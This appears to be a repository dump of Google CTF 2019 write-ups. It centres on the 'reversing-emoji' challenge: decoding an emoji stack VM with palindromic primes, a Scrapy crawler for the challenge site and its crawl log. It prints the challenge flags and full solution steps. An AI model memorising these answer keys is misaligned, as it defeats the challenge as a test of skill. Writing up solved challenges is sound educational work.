121 | Content-Transfer-Encoding: base64
122 |
123 | Q1RGe1RoM3IzXzFzXzRsdzR5NV80TjA3aDNyX1c0eX0K
124 | --790050884-595716176-916811417--
125 | ```
126 |
127 | Another base64 decode and we get the flag `CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}`.
--------------------------------------------------------------------------------
/07-reversing-emoji/.gitignore:
--------------------------------------------------------------------------------
primes*.txt
--------------------------------------------------------------------------------
/07-reversing-emoji/07.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/07.zip
--------------------------------------------------------------------------------
/07-reversing-emoji/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## FriendSpaceBookPlusAllAccessRedPremium.com
3 | Label: reversing
4 |
5 | Having snooped around like the expert spy you were never trained to be, you found something that takes your interest: "Cookie/www.FriendSpaceBookPlusAllAccessRedPremium.com" But unbeknownst to you, it was only the 700nm Wavelength herring rather than a delicious cookie that you could have found. It looks exactly like a credential for another system. You find yourself in search of a friendly book to read.
6 |
7 | Having already spent some time trying to find a way to gain more intelligence... and learn about those fluffy creatures, you (several)-momentarily divert your attention here. It's a place of all the individuals in the world sharing large amounts of data with one another. Strangely enough, all of the inhabitants seem to speak using this weird pictorial language. And there is hot disagreement over what the meaning of an eggplant is.
8 |
9 | But not much Cauliflower here. They must be very private creatures. SarahH has left open some proprietary tools, surely running this will take you to them. Decipher this language and move forth!
10 |
11 | # Solution
12 | The attachment is a zip containing a `program` file and a `vm.py` file. Looking at the files, it appears that there is a stack-based virtual machine implemented in `vm.py` which runs emoji-based code located in `program`. If we just run the program with `python3 vm.py program`, it begins to print out a URL, but it seems to stop after a bit. I initially thought that I would have to translate the program to figure out what it does and try to fix it; however, after waiting a bit, the program prints out more of the URL. It seems that whatever the program is doing takes longer and longer to calculate each result. After waiting long enough we can guess the URL `http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com`.
13 |
14 | The website appears to be a collection of pictures of cats. Each page has a picture and a set of links, and each link leads to another page and so on. Using `scrapy`, I crawled all the links and downloaded all the images. Going through them, it doesn't look like any of the pictures have the flag in them, either in the image itself or in the binary. So maybe the guess is incorrect and there is still more in the URL.
15 |
16 | Taking a look at the program again, it seems like there are 3 phases of `🚛 🥇 1️⃣ 0️⃣ 1️⃣ 1️⃣ 4️⃣ 1️⃣ 0️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇` instructions. Looking at the operations map, these instructions are creating and pushing the values of the first register onto the stack. Note that each block also ends with `🚛 🥈 7️⃣ 6️⃣ 5️⃣ ✋`, which loads a value into the second register. If we work backwards by searching for all the print instructions (🎤), we can see that they all have an `xor (🌓)` instruction before them. So the first assumption is that it is xoring each of the numbers on the stack and printing them out. Adding the line `print("{} ^ {}\n".format(b, a))` to the `xor` function in the vm prints out
17 |
18 | ```
19 | 106 ^ 2 h
20 | 119 ^ 3 t
21 | 113 ^ 5 t
22 | 119 ^ 7 p
23 | 49 ^ 11
24 | 74 ^ 101
25 | 172 ^ 131
26 | 242 ^ 151
27 | 216 ^ 181
28 | 208 ^ 191
29 | 339 ^ 313
30 | 264 ^ 353
31 | 344 ^ 373
32 | 267 ^ 383
33 | 743 ^ 727
34 | 660 ^ 757
35 | 893 ^ 787
36 | 892 ^ 797
37 | 1007 ^ 919
38 | 975 ^ 929
39 | ```
40 |
41 | The numbers on the left of the xor match the values pushed onto the stack. All 3 blocks are similar, so we can assume that they are all doing the same thing with different numbers. We can also guess that the numbers on the right have to be calculated, and that the time it takes to calculate them increases as the program goes on. We can also see that the numbers on the right are primes, which supports our theory that maybe we need to make the calculations more efficient. They seem to be specific primes, however, not just any prime number. There is an [online database for number sequences](https://oeis.org/), so we can just enter those numbers there and see that they are [palindromic prime numbers](https://oeis.org/A002385). It even gives us a small list and algorithms to find them. Another observation is that the palindromes are in order, so now we can just calculate them and xor each one with the values. `extract-palindromes.py` outputs a list of palindromes in the `palindromes` file. Filtering the first 6 million primes is enough to get all the palindromes needed. `palindromes.py` reads the list of palindromes and xors them with the correct values.
42 |
43 | The first chunk prints out `http://emoji-t0anaxnr3nacpt4na.web.ctfco`, and we can already see that the URL is longer than the one we had earlier. We already know the rest of the URL, which is `mpetition.com/`, and that matches the number of values in the next chunk. Using this, we can reverse it and double check that we are doing it correctly. If we try doing the same thing with the second chunk, it does not produce the same output. This is where the `🚛 🥈 9️⃣ 9️⃣ ✋` comes in. That value gives us the starting index - 1. Finally, the full URL is `http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/humans_and_cauliflowers_network/` and we can get the flag `CTF{Peace_from_Cauli!}`.
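The decoding described above, as an added example (this is not the repository's `extract-palindromes.py` or `palindromes.py`): it constructs palindromic primes directly from their digits instead of filtering a list of primes, then xors them with the 20 stack values shown in the trace above. The function names and the 0-based `start` offset into the sequence are assumptions of this sketch.

```python
from itertools import count, islice

# Left-hand operands of the first 20 xor calls, copied from the trace above.
TRACE_VALUES = [106, 119, 113, 119, 49, 74, 172, 242, 216, 208,
                339, 264, 344, 267, 743, 660, 893, 892, 1007, 975]

_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_prime(n):
    """Miller-Rabin with fixed bases; deterministic for n < 3.3e24."""
    if n < 2:
        return False
    for p in _BASES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for a in _BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def palindromic_primes():
    """Yield palindromic primes in increasing order (OEIS A002385)."""
    yield from (2, 3, 5, 7, 11)
    # Every even-length palindrome is divisible by 11, so after 11 only
    # odd lengths matter: mirror a "half" around its last digit.
    for half_len in count(2):
        for half in range(10 ** (half_len - 1), 10 ** half_len):
            digits = str(half)
            if digits[0] in "24568":  # palindrome would end in an even digit or 5
                continue
            candidate = int(digits + digits[-2::-1])
            if is_prime(candidate):
                yield candidate


def decode(values, start=0):
    """Xor each value with consecutive palindromic primes from offset `start`."""
    key = islice(palindromic_primes(), start, start + len(values))
    return "".join(chr(v ^ p) for v, p in zip(values, key))


def encode(text, start=0):
    """Inverse of decode; used here only to build constructed test input."""
    key = islice(palindromic_primes(), start, start + len(text))
    return [ord(c) ^ p for c, p in zip(text, key)]


if __name__ == "__main__":
    print(decode(TRACE_VALUES))
```

Decoding a later chunk with the wrong `start` produces garbage rather than an error, which matches the behaviour the write-up describes for the second chunk.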
--------------------------------------------------------------------------------
/07-reversing-emoji/__pycache__/crawl.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/__pycache__/crawl.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/__pycache__/vm.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/__pycache__/vm.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__init__.py
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/settings.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/settings.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/items.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html

import scrapy


class ImageItem(scrapy.Item):
    # define the fields for your item here like:
    # name = scrapy.Field()
    # image_urls is read by scrapy's ImagesPipeline; images is filled in by it.
    image_urls = scrapy.Field()
    images = scrapy.Field()

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/middlewares.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html

from scrapy import signals


class CtfCrawlSpiderMiddleware(object):
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the spider middleware does not modify the
    # passed objects.

    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s

    def process_spider_input(self, response, spider):
        # Called for each response that goes through the spider
        # middleware and into the spider.

        # Should return None or raise an exception.
        return None

    def process_spider_output(self, response, result, spider):
        # Called with the results returned from the Spider, after
        # it has processed the response.

        # Must return an iterable of Request, dict or Item objects.
        for i in result:
            yield i

    def process_spider_exception(self, response, exception, spider):
        # Called when a spider or process_spider_input() method
        # (from other spider middleware) raises an exception.

        # Should return either None or an iterable of Response, dict
        # or Item objects.
        pass

    def process_start_requests(self, start_requests, spider):
        # Called with the start requests of the spider, and works
        # similarly to the process_spider_output() method, except
        # that it doesn’t have a response associated.

        # Must return only requests (not items).
        for r in start_requests:
            yield r

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)


class CtfCrawlDownloaderMiddleware(object):
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the downloader middleware does not modify the
    # passed objects.

    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s

    def process_request(self, request, spider):
        # Called for each request that goes through the downloader
        # middleware.

        # Must either:
        # - return None: continue processing this request
        # - or return a Response object
        # - or return a Request object
        # - or raise IgnoreRequest: process_exception() methods of
        #   installed downloader middleware will be called
        return None

    def process_response(self, request, response, spider):
        # Called with the response returned from the downloader.

        # Must either;
        # - return a Response object
        # - return a Request object
        # - or raise IgnoreRequest
        return response

    def process_exception(self, request, exception, spider):
        # Called when a download handler or a process_request()
        # (from other downloader middleware) raises an exception.

        # Must either:
        # - return None: continue processing this exception
        # - return a Response object: stops process_exception() chain
        # - return a Request object: stops process_exception() chain
        pass

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/pipelines.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html

class CtfCrawlPipeline(object):
    def process_item(self, item, spider):
        return item

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/settings.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

# Scrapy settings for ctf_crawl project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
#     https://doc.scrapy.org/en/latest/topics/settings.html
#     https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#     https://doc.scrapy.org/en/latest/topics/spider-middleware.html

BOT_NAME = 'ctf_crawl'

SPIDER_MODULES = ['ctf_crawl.spiders']
NEWSPIDER_MODULE = 'ctf_crawl.spiders'


# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'ctf_crawl (+http://www.yourdomain.com)'

# Obey robots.txt rules
ROBOTSTXT_OBEY = True

# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32

# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16

# Disable cookies (enabled by default)
#COOKIES_ENABLED = False

# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False

# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
#   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#   'Accept-Language': 'en',
#}

# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
#    'ctf_crawl.middlewares.CtfCrawlSpiderMiddleware': 543,
#}

# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
#    'ctf_crawl.middlewares.CtfCrawlDownloaderMiddleware': 543,
#}

# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
#    'scrapy.extensions.telnet.TelnetConsole': None,
#}

# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {'scrapy.pipelines.images.ImagesPipeline': 1}
IMAGES_STORE = 'images'

# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False

# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__init__.py:
--------------------------------------------------------------------------------
# This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.

--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/cat_images.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/cat_images.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/cat_images.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
import scrapy
import scrapy.item


class CatImagesSpider(scrapy.Spider):
    name = 'cat_images'
    # Keep the crawl on the challenge host only.
    allowed_domains = ['emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com']
    start_urls = ['http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com']

    def parse(self, response):
        # Queue every image on the page for download by the ImagesPipeline.
        for img in response.xpath('//img[@src]/@src').getall():
            yield ImageItem(image_urls=['http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/' + img])
        # Record the URL of the page that was visited.
        yield {'url': response.url}

        # Follow the links listed on the page and parse them the same way.
        for next_page in response.xpath('//ul/li/a[@href]/@href').getall():
            yield response.follow(next_page, self.parse)


class ImageItem(scrapy.Item):
    # image_urls is read by scrapy's ImagesPipeline; images is filled in by it.
    image_urls = scrapy.Field()
    images = scrapy.Field()
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/images.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/images.zip
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/output.json:
--------------------------------------------------------------------------------
1 | [
79 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/968674872368d11d99758f9f4fa33d58.html", "images": []},
80 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/75f4f167ff1f7420bbc1cd9e3cd582f9.html", "images": []},
81 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-20.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-20.png", "path": "full/a7ed03a5f862a227aa9d8a231d5e14bc597e8def.jpg", "checksum": "236d0aa6d08e984f81373d69b669333c"}]},
82 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cb6a01e6c7b12a34da7e15a1929a759b.html", "images": []},
83 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-49.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-49.png", "path": "full/2a7d838a735bbbe9784d64c3b4cb339eb928bb0c.jpg", "checksum": "3e1d3b4a606895d4bcf1acc097363d23"}]},
84 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-42.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-42.png", "path": "full/03442a8406ee2b5255a3ac872c1b5211d9008f49.jpg", "checksum": "627c23085ed8528e3a91b71753ef986c"}]},
85 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-51.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-51.png", "path": "full/ce76d6761ad80a79aeac15f03acf666e9d466219.jpg", "checksum": "27e13a585db629ffa98bafd195fd771d"}]},
86 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-09.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-09.png", "path": "full/11853c4bbb6d521d9251b8c6951c37f53a121045.jpg", "checksum": "187b33cc13b1b099f6c407c1747498ce"}]},
87 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-06.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-06.png", "path": "full/2eb685ba86b77cd8a7e8d6a98757bf0885d6c1e9.jpg", "checksum": "85a7eb69afe794b7e851701004abb82c"}]},
88 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-13.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-13.png", "path": "full/9db8d2413cad5c2f8dc47c615fe5e0815bc71198.jpg", "checksum": "ee28eed52b3371bdcba0c7c5b589cf91"}]},
89 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-18.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-18.png", "path": "full/5d6851300fd32edf5f96f3fa8831500de0a3260c.jpg", "checksum": "94195d9ab48cf7faf2841d70a173a357"}]},
90 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-39.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-39.png", "path": "full/12230330606de58c0ba46cb77e33addcf3df3bfe.jpg", "checksum": "2a3cb43ab82a0c62eeb9230bf78af7d3"}]},
91 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-43.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-43.png", "path": "full/da6110fb99479ae926a34e3a08068ac1c2a00136.jpg", "checksum": "b746b1c0eb5f84aa47c1be58bab022b9"}]},
92 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-23.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-23.png", "path": "full/7693e8259b7b7c7aa823b546c1a4c12b8e0c5ef5.jpg", "checksum": "30fe42155b01005de1a64b2b1487d28f"}]},
93 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-40.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-40.png", "path": "full/66b6dfb9742608a53e3a9887df11937c62af5486.jpg", "checksum": "06343e6e9d77192137fe12a5e611b0d7"}]},
94 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-02.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-02.png", "path": "full/a157f2aacd198c0e467930b621a58a710bf62003.jpg", "checksum": "db50c0c3335cb6edcdf43e9b6d63996d"}]},
95 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-38.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-38.png", "path": "full/56fccaa3f7f732e6a81659d0c3650f919418a1b9.jpg", "checksum": "9ec1f3016c3382d02c9993241456abbb"}]},
96 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1dec2ca01d4483533348b872bff74c6f.html", "images": []},
97 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/835d04820fb39bafd50547f6859f4729.html", "images": []},
98 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/647ac82477b912a3b93c751111202ecf.html", "images": []},
99 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5dbbfb29d8308ee367eac88d25c2b1d4.html", "images": []},
100 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/2c1ff627fad3ccf58988458183d04207.html", "images": []},
101 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-24.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-24.png", "path": "full/eaf9275859066337ee9705a8704be9135890bac7.jpg", "checksum": "7bdc16e7b04575df41b98d5ebcfb08d0"}]},
102 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-44.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-44.png", "path": "full/e2491453f23a56d000f9bb1f94c50bbfd1a49f88.jpg", "checksum": "19eeaf7c454c769e6549dc1975b9bec2"}]},
103 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-11.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-11.png", "path": "full/032025a04942044e0f52ef1b93adbd320bce5c03.jpg", "checksum": "2925ccc7fd21146022744fdff2bed4cb"}]},
104 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-41.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-41.png", "path": "full/b4e5ce6a49dcc0a52ba4718bcac7ed7dfcd2c363.jpg", "checksum": "30567c6ebf0a10c5fe6263ec3dd96a34"}]},
105 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-55.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-55.png", "path": "full/e882748be2bc4164a96f7e68a11c45c6fc7e4f21.jpg", "checksum": "39c33b88672614615684d0f68a333f41"}]},
106 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-04.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-04.png", "path": "full/888145b3870b3aa0ac76bdb8f058ccbd9c24294b.jpg", "checksum": "4634f7a31cc78f720af264eb88b54823"}]},
107 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-19.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-19.png", "path": "full/b5a863b50e48f479df73287fea653eb38aae756a.jpg", "checksum": "021adc2e8e0599aa5ace57def75595aa"}]},
108 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-32.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-32.png", "path": "full/4296a5117242aa1f727f602d9b61184399f97ae1.jpg", "checksum": "2d3f07e51e4b8bd9851814cf455b5b3f"}]},
109 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-35.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-35.png", "path": "full/9190ffcff48c22b119389d57737ddcac12018867.jpg", "checksum": "ce459ca6cf2cf65f7204bf1221a05f5a"}]},
110 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-54.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-54.png", "path": "full/d18af402bddd63c6fbe50fa3dd5ef2b3a1c7eba1.jpg", "checksum": "dcc4c0992df45ca75a3cf2ba43b28389"}]},
111 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-03.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-03.png", "path": "full/46cbe8e778a2d9810ec093fd4411358559ebbaa9.jpg", "checksum": "4df7ec39415813ef368595efbb93ed0b"}]},
112 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-17.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-17.png", "path": "full/f170155323cc57d63c8652a19ec02ec817015b01.jpg", "checksum": "be42c8d16ae37258c72a10f9c1bf9d34"}]},
113 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png", "path": "full/b66cef15fb1f24f0357c293fabd1ee4ae370fcea.jpg", "checksum": "da8327ecd3cf8045541b5297509d3b55"}]}
114 | ][
115 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com", "img": "
", "images": []},
116 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/7e7399c7d06333ec886eee6b678d3595.html", "img": "
", "images": []},
117 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/eaccf8725acda38ec2c1d9a591d54601.html", "img": "
", "images": []},
118 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/94ad2d38e6c461572bad2199d0fd00ff.html", "img": "
", "images": []},
119 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c4827b3b9c0c9e94183f30303f1cf8cf.html", "img": "
", "images": []},
120 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/211fb2008f7e90b83c307931957642aa.html", "img": "
", "images": []},
121 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b9ef5a48186aacc5a1ca7e3f6edd48d2.html", "img": "
", "images": []},
122 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f6b0fe40439503e23e68e62a8af8e52.html", "img": "
", "images": []},
123 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cdea521070598db1a707d2e143e374e3.html", "img": "
", "images": []},
124 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bc38f47945d2d515719a37dacd214240.html", "img": "
", "images": []},
125 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/0aecf5c83a232343bb1b1b7ffb666438.html", "img": "
", "images": []},
126 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f9dbf163a76a90fd2a6b4de1010841e.html", "img": "
", "images": []},
127 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2817b54b53077139e388c240060035f.html", "img": "
", "images": []},
128 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5bfb79469792c7dde95217f19536be92.html", "img": "
", "images": []},
